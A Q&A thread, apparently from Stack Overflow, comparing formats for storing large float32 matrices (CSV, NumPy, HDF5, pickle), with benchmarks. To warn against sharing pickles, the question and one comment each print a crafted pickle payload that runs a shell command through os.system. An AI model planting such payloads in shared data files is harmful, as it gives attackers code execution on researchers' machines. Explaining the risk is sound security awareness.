Storing large dense 2D matrix of float32 data

Question

I am searching for the best possible solution for storing large dense 2D matrices of floating-point data, generally float32 data.

The goal would be to share scientific data more easily from websites like the Internet Archive and make such data FAIR.

My current approaches (listed below) fall short of the desired goal, so I thought I might ask here, hoping to find something new, such as a better data structure. Even though my examples are in Python, the solution does not need to be in Python. Any good solution will do, even one in COBOL!

CSV-based

One approach I tried would be to store the values as compressed CSVs using pandas, but this is excruciatingly slow, and the end compression is not exactly optimal (generally a 50% from the plain CSV on the data I tried this on, which is not flawed but not sufficient to make this viable.) In this example, I am using gzip. I have also tried LZMA, but it is generally way slower, and, at least on the data I tried it on, it does not yield a significantly better result.

import pandas as pd
my_data: pd.DataFrame = create_my_data_doing_something()
my_data.to_csv("my_data_saved.csv.gz")

NumPy Based

Another solution is to store the data into a NumPy-like matrix and then compress it on a disk.

import numpy as np
my_data: np.ndarray = create_my_data_doing_something()
np.save("my_data_saved.npy", my_data)

and afterwards

gzip -k my_data_saved.npy

Numpy with H5

Another possible compression is H5, but as shown in the benchmark below it does not do better than the plain numpy.

with h5py.File("my_data_saved.h5", 'w') as hf:
    hf.create_dataset("my_data_saved",  data=my_data)

Issues in using the Numpy format

While this may be a good solution, we limit the scope of usability of the data to people that can use Python. Of course, this is a vast pool of people, though, in my circles, many biologists and mathematicians abhor Python and like to stick to Matlab and R (and therefore would not know what to do with a .npy.gz file).

Pickle

Another solution, as correctly pointed out by @lojza, is to store the data into a pickle object, which may also be compressed to a disk. Pickle obtains in my benchmarks (see below) a compression ratio comparable with what is obtained with Numpy.

import pickle
import compress_pickle

my_data: np.ndarray = create_my_data_doing_something()

# Not compressed pickle
with open("my_data_saved.pkl", "wb") as f:
    pickle.dump(my_data, f)

# Compressed version
compress_pickle.dump(df, "my_data_saved.pkl.gz")

Issues in using Pickle format

The issue in using Pickle is two-fold: first, the same Python-dependency issue discussed above. Secondly, there is a significant security issue: the Pickle format can be used for arbitrary code execution exploits. People should be wary of downloading random pickle files from the internet (and here, the goal is to make people share datasets on the internet).

python import pickle
# Build the exploit
command = b"""cat flag.txt"""

x = b"c__builtin__\ngetattr\nc__builtin__\n__import__\nS'os'\n\x85RS'system'\n\x86RS'%s'\n\x85R."%command

# Test it
pickle.load(x)

Benchmarks

I have executed benchmarks to provide a baseline on which to improve. Here, we can see that generally, Numpy is the best performing choice, and to my knowledge, it should not have any security risk in its format. It follows that a compressed NumPy array is currently the best contender, please let's find a better one!

Examples

To share some actual use cases of this relatively simple task, I share a couple of graphs embedding the complete OBO Foundry graph. If there were a way to make these files smaller, sharing them would be significantly more accessible, allowing for more reproducible experiments and accelerating research in the bio-ontologies (for this specific data) and other fields.

What other approaches may I try?

Hi! Pickle is much much much worse than any of the aforementioned options, even when using libraries such as [Compress pickle](https://github.com/lucianopaz/compress_pickle). It includes a significant amount of metadata relative to the object in Python, which are not important for the data themselves. — Luca Cappelletti, May 30 '22 at 14:04
Of course, 2D arrays do not need metadata except for the shape, but Python will store information when using Pickle of the variable names and so on and so forth. Pickle is not a good format for a number of reasons and in this context the fact that it is not a compressed format at all. — Luca Cappelletti, May 30 '22 at 14:22
I am running some benchmarks which I will attach to the question soon. — Luca Cappelletti, May 30 '22 at 14:30
One of the most worrying thing about pickles is how easily one could add malevolous code in the dataset and make it execute to researcher. One simple example would be: ```python import pickle # Build the exploit command = b"""cat flag.txt""" x = b"c__builtin__\ngetattr\nc__builtin__\n__import__\nS'os'\n\x85RS'system'\n\x86RS'%s'\n\x85R."%command # Test it pickle.load(x) ``` — Luca Cappelletti, May 30 '22 at 14:40
I have updated the question and added a section for Pickle. You were absolutely right on the file dimensions, as I must have recalled some other use cases: in this one, it is absolutely comparable with a NumPy array. — Luca Cappelletti, May 30 '22 at 20:11
Not an expert, but may worth looking into popular formats in big data domain e.g. [HDF5](https://www.hdfgroup.org/solutions/hdf5/) — lpounng, May 31 '22 at 04:47
Hello @lpounng, I have added H5 to the benchmark. You can see that it behaves exactly like a plain NumPy array, and performs worse than NumPy + gzip. It seems it does not actually execute any compression. — Luca Cappelletti, May 31 '22 at 07:50
Very good job @LucaCappelletti! I see the issue with pickle now. Don't you have some speed/time data from your benchmarks to share please? Thank you — lojza, May 31 '22 at 08:28
I forgot to track them and it took hours to complete the whole benchmark, so I will re-run it tracking also time only when we have some other interesting contender to add a complete view of the issue. — Luca Cappelletti, May 31 '22 at 09:01
I am not surprised few people access this data. I normally get 350Mb/s of Internet bandwidth but can't even get 350kB/s from your site and it predicts 1 hour 40mins for the download of one of your 2.3GB gzipped CSV files! — Mark Setchell, May 31 '22 at 11:32
That is not a website of mine, that's the Internet Archive, which is great as it is free and hosting large files is very expensive. There are a number of analogous websites with different tradeoffs and the internet connection issue is exactly why compression is important. We generally host the most important files on (pricy) servers with a dedicated internet connection. Do consider that the files I shared as examples are small compared to the TB-sized files we often have to deal with in my field of research. — Luca Cappelletti, May 31 '22 at 11:46
Just using an `np.random.uniform(size=(10_000, 1000))` is already a reasonably good approximation for these files. As you can see, in the benchmarks I have also added integer cases as they also are of interest. — Luca Cappelletti, May 31 '22 at 13:25
In the original files of course there is somewhat less entropy, as the values tend to follow an exponential distribution and therefore the compression rate tends to be better. — Luca Cappelletti, May 31 '22 at 13:26
@LucaCappelletti [H5 uses Gzip under the hood](https://www.hdfgroup.org/2017/05/hdf5-data-compression-demystified-2-performance-tuning/), and definitely does some compression (otherwise it would be CSV-like performance). The (small) gap between Numpy+Gzip is probably due to H5 is designed to handle heterogeneous data types, while Numpy is purely numerical. — lpounng, Jun 01 '22 at 02:00
Based on the benchmarks, I'd say we are hitting the compression limit for this type of data (let alone more parameter tuning e.g. cache/dictionary size). Very comprehensive work indeed! — lpounng, Jun 01 '22 at 02:03
@lpounng the huge difference between CSV and Numpy is that Numpy, while neither are doing any compression, the first writes out characters, while Numpy writes out the numbers in binary numeric representations. H5 does not do any better than numpy, suggesting it is not compressing anything. Numpy + Gzip, instead, achieves a better compression rate. — Luca Cappelletti, Jun 01 '22 at 07:08
@LucaCappelletti As I said, H5 uses Gzip under the hood, thus guarantees to use compression, just that the level of compression is worse than Numpy. *Not doing better* than Numpy is not an indication of *no* compression. These are 2 different concepts. — lpounng, Jun 01 '22 at 07:24
@LucaCappelletti sorry wait a sec... For H5, did you enable compression options by setting parameters `compression` and `compression_opts` in `create_dataset`? — lpounng, Jun 01 '22 at 07:37
The code used is the one shown in the question, unless they are enabled by default I did not use those parameters. Can you point me to a guide showing the best practices when using H5? — Luca Cappelletti, Jun 01 '22 at 08:43